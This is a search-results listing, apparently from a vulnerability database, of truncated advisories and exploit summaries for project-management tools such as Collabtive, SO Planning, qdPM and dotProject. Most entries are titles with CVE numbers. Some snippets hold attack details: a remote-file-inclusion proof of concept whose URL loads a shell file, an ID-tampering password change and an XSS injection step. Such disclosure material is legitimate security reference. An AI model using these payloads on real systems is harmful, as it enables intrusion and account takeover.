776 matches found
SO Planning SQL Injection Vulnerability
SO Planning is a free and open source set of online project production and management tools. SO Planning is vulnerable to a SQL injection vulnerability. The vulnerability is due to the program failing to adequately filter user-submitted input before constructing SQL query statements. An attacker...
SO Planning Path Traversal Vulnerability
SO Planning is a free and open source set of online project production and management tools. SO Planning suffers from a path traversal vulnerability. An attacker can exploit this vulnerability to detect arbitrary remote files...
SO Planning 1.32 - Multiple Vulnerabilities
SO Planning 1.32 - Multiple Vulnerabilities SOPlanning - Simple Online Planning Tool multiple vulnerabilities CVEs: CVE-2014-8673, CVE-2014-8674, CVE-2014-8675, CVE-2014-8676, CVE-2014-8677 Vendor: http://www.soplanning.org/ Product: SOPlanning - Simple Online Planning Version affected: 1.32 and...
Microsoft Office Project Memory Validation Remote Code Execution (MS09-074) - Ver2 (CVE-2009-0102)
Microsoft Project is a project management software program designed to assist project managers to stay informed, keep project teams aligned, increase productivity and control project work, schedules, and finances. A remote code execution vulnerability has been identified in the way Microsoft...
WSS项目管理系统越权修改信息密码
简要描述: 再也不用担心老大给任务了 详细说明: 公司一直用的是wss 1.3.2 无聊中想去看看这个有没有洞 明天要上班,大晚上的也不想去分析代码了,就用黑盒去试了一试 在用户这个地方,每个用户都有一个recordID 用自己公司的wss来做示范,当然是用基友的账号了,老大的可不敢动 先问一下基友的密码是多少 然后去修改自己的资料 抓包,将自己的ID改成基友的ID,他的ID是11,我的是14 改成六个2之后提示修改正确,然后去登陆看看 登陆成功! 然后我去告诉他之后,唉。 img s...
JExperts Tecnologia / Channel Software Multiple Vulnerabilities
JExperts Tecnologia / Channel software version 5.0.33CCB allows for authorization bypass / privilege escalation via tampering with parameters in the GET request and a cross site scripting vulnerability. CVE-2014-8558 - JExperts Tecnologia / Channel Software Escalation Access Issues Vendor Notifie...
insight.ly Cross Site Scripting
Author:Provensec Vendor: insight.ly Vulnerability Type:persistent xss Discription: Integrated online customer relationship management CRM and project management makes sure you are on top of critical business processes. Exploit: 1 Goto add contacts 2 Fill the work address field with xss payload...
qdPM 7 - Arbitrary File upload
No description provided by source. Exploit qdPM v.7 Arbitrary File upload Date: June 13th 2012 Author: loneferret Version: 7 Vendor Url: http://qdpm.net/ Tested on: Winddows XP / XAMPP Discovered by: loneferret Software description: Free project management tool for small team qdPM is a free...
netOffice Dwins <= 1.4p3 SQL Injection Vulnerability
No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-11-08 netOffice Dwins = 1.4p3 SQL Injection Vulnerability Script: netOffice Dwins is a free w...
PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
No description provided by source. PHP Project Management = 0.8.10 Multiple RFI / LFI Vulnerabilities http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz DORK : PHP Project Management 0.8.10 POC : RFI /modules/certinfo/index.php?fullpath=http://localhost/shell.txt?...
Collabtive 0.65 - Multiple Vulnerabilities
No description provided by source. ANATOLIA SECURITY ADVISORY ------------------------------------ ADVISORY INFO + Title: Collabtive Multiple Vulnerabilities + Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-003.txt + Advisory ID: 2010-003 + Version: 0.65 + Date: 12/10/2010 + Impact...
Collabtive SQL Injection Vulnerability
No description provided by source. ANATOLIA SECURITY ADVISORY --------------------------- ADVISORY INFO + Title: Collabtive SQL Injection Vulnerability + Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-004.txt + Advisory ID: 2010-004 + Version: 0.65 + Date: 12/10/2010 + Impact:...
dotproject <= 2.1.6 - Remote File Inclusion Vulnerability
No description provided by source. :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ Y$c$$ 888,o8P'88 .d888 888 Y88 MMMMP YmmMMMM MMM YM Discovered by dun \ posdubatgmail.com 2012-11-13 dotProject = 2.1.6 Remote File Inclusion Vulnerability Script: PHP web-based project...
Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection
No description provided by source. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ || || || Advisory : Collabtive Sql Injection || || Affected Version : 1.1 || || Vendor : http://collabtive.o-dyn.de/index.php || || Risk : Medium || || CVE-ID : 2013-6872 || || Tested on Platform...
Collabtive 1.2 - Stored XSS
No description provided by source. Vulnerability title: Stored XSS vulnerability in Collabtive application CVE-2014-3247 CVE: CVE-2014-3247coordinated with cve assigning team and vendor Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version: 1.12 Fixed...
Collabtive 1.2 - SQL Injection
No description provided by source. Vulnerability title: SQL Injection / SQL Error message in Collabtive application CVE-2014-3246 CVE: CVE-2014-3246 cordinated with Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version: 1.12 Fixed version: 2.0 Reported by...
Collabtive 1.12 SQL Injection
Vulnerability title: SQL Injection / SQL Error message in Collabtive application CVE-2014-3246 CVE: CVE-2014-3246 cordinated with Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version: 1.12 Fixed version: 2.0 Reported by: Deepak Rathore Severity: Critical...
Collabtive 1.2 - Persistent Cross-Site Scripting
Collabtive 1.2 - Persistent Cross-Site Scripting Vulnerability title: Stored XSS vulnerability in Collabtive application CVE-2014-3247 CVE: CVE-2014-3247coordinated with cve assigning team and vendor Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version:...
Collabtive 1.2 - SQL Injection
Collabtive 1.2 - SQL Injection Vulnerability title: SQL Injection / SQL Error message in Collabtive application CVE-2014-3246 CVE: CVE-2014-3246 cordinated with Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version: 1.12 Fixed version: 2.0 Reported by:...
Collabtive 1.2 - SQL Injection
Vulnerability title: SQL Injection / SQL Error message in Collabtive application CVE-2014-3246 CVE: CVE-2014-3246 cordinated with Vendor: Collabtive Product: Collabtive Open Source Project Management Software Affected version: 1.12 Fixed version: 2.0 Reported by: Deepak Rathore Severity: Critical...